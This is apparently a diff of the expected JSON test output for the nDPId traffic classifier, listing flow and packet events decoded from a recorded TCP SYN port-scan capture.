-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1328,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1328,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1334,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1334,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1334,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1334,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5431,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5432,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5431,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5432,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056274,"flow_last_seen":1278275056274,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056274,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1278275056274,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056274,"pkt":"ACYLMQczACWzv5HuCABFAAAs5wgAADYGK2qsEAAIQA2GNIzSAbvdUoMYAAAAAGACDAAq1AAAAgQFtA=="} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"synscan.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056276,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"synscan.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056276,"pkt":"ACYLMQczACWzv5HuCABFAAAsWtAAAC4Gv6KsEAAIQA2GNIzSAI\/dUoMYAAAAAGACDAAsAAAAAgQFtA=="} 
+00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"synscan.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056276,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"synscan.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056276,"pkt":"ACYLMQczACWzv5HuCABFAAAsxSoAAC0GVkisEAAIQA2GNIzSDOrdUoMYAAAAAGACCAAjpQAAAgQFtA=="} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"synscan.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056276,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"synscan.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056276,"pkt":"ACYLMQczACWzv5HuCABFAAAsXg4AACoGwGSsEAAIQA2GNIzSAMfdUoMYAAAAAGACDAAryAAAAgQFtA=="} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"synscan.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056276,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"synscan.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056276,"pkt":"ACYLMQczACWzv5HuCABFAAAs72YAADQGJQysEAAIQA2GNIzSAG\/dUoMYAAAAAGACBAA0IAAAAgQFtA=="} 
+00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"synscan.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056276,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"synscan.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056276,"pkt":"ACYLMQczACWzv5HuCABFAAAsQzMAACsG2j+sEAAIQA2GNIzSBAHdUoMYAAAAAGACEAAkjgAAAgQFtA=="} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"synscan.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056276,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"synscan.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056276,"pkt":"ACYLMQczACWzv5HuCABFAAAsMnwAACwG6fasEAAIQA2GNIzSA+PdUoMYAAAAAGACBAAwrAAAAgQFtA=="} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"synscan.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056276,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":587,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"synscan.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056276,"pkt":"ACYLMQczACWzv5HuCABFAAAs3nEAADAGOgGsEAAIQA2GNIzSAkvdUoMYAAAAAGACBAAyRAAAAgQFtA=="} 
+00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"synscan.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056276,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"synscan.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056276,"pkt":"ACYLMQczACWzv5HuCABFAAAspjUAADYGbD2sEAAIQA2GNIzSADXdUoMYAAAAAGACDAAsWgAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"synscan.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056276,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"synscan.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056276,"pkt":"ACYLMQczACWzv5HuCABFAAAsxrsAADgGSbesEAAIQA2GNIzSFwzdUoMYAAAAAGACBAAdgwAAAgQFtA=="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"synscan.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1278275056338,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1278275056338,"pkt":"ACWzv5HuACYLMQczCABFAAAsAABAADYG0nJADYY0rBAACAA1jNJCmj\/E3VKDGWASFtCfagAAAgQFZAAA"} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"synscan.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056340,"flow_last_seen":1278275056340,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056340,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"synscan.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1278275056340,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056340,"pkt":"ACYLMQczACWzv5HuCABFAAAsv+0AADcGUYWsEAAIQA2GNIzSABXdUoMYAAAAAGACEAAoegAAAgQFtA=="} 
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"synscan.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056340,"flow_last_seen":1278275056340,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056340,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"synscan.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1278275056340,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056340,"pkt":"ACYLMQczACWzv5HuCABFAAAsQrAAADsGysKsEAAIQA2GNIzSAHHdUoMYAAAAAGACEAAoHgAAAgQFtA=="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"synscan.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1278275056401,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1278275056401,"pkt":"ACWzv5HuACYLMQczCABFAAAoAABAADYG0nZADYY0rBAACABxjNKSwt+J3VKDGVAUAADdegAAAAAAAAAA"} 
+00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"synscan.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056403,"flow_last_seen":1278275056403,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056403,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"synscan.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1278275056403,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056403,"pkt":"ACYLMQczACWzv5HuCABFAAAstfQAACYGbH6sEAAIQA2GNIzSAFDdUoMYAAAAAGACDAAsPwAAAgQFtA=="} 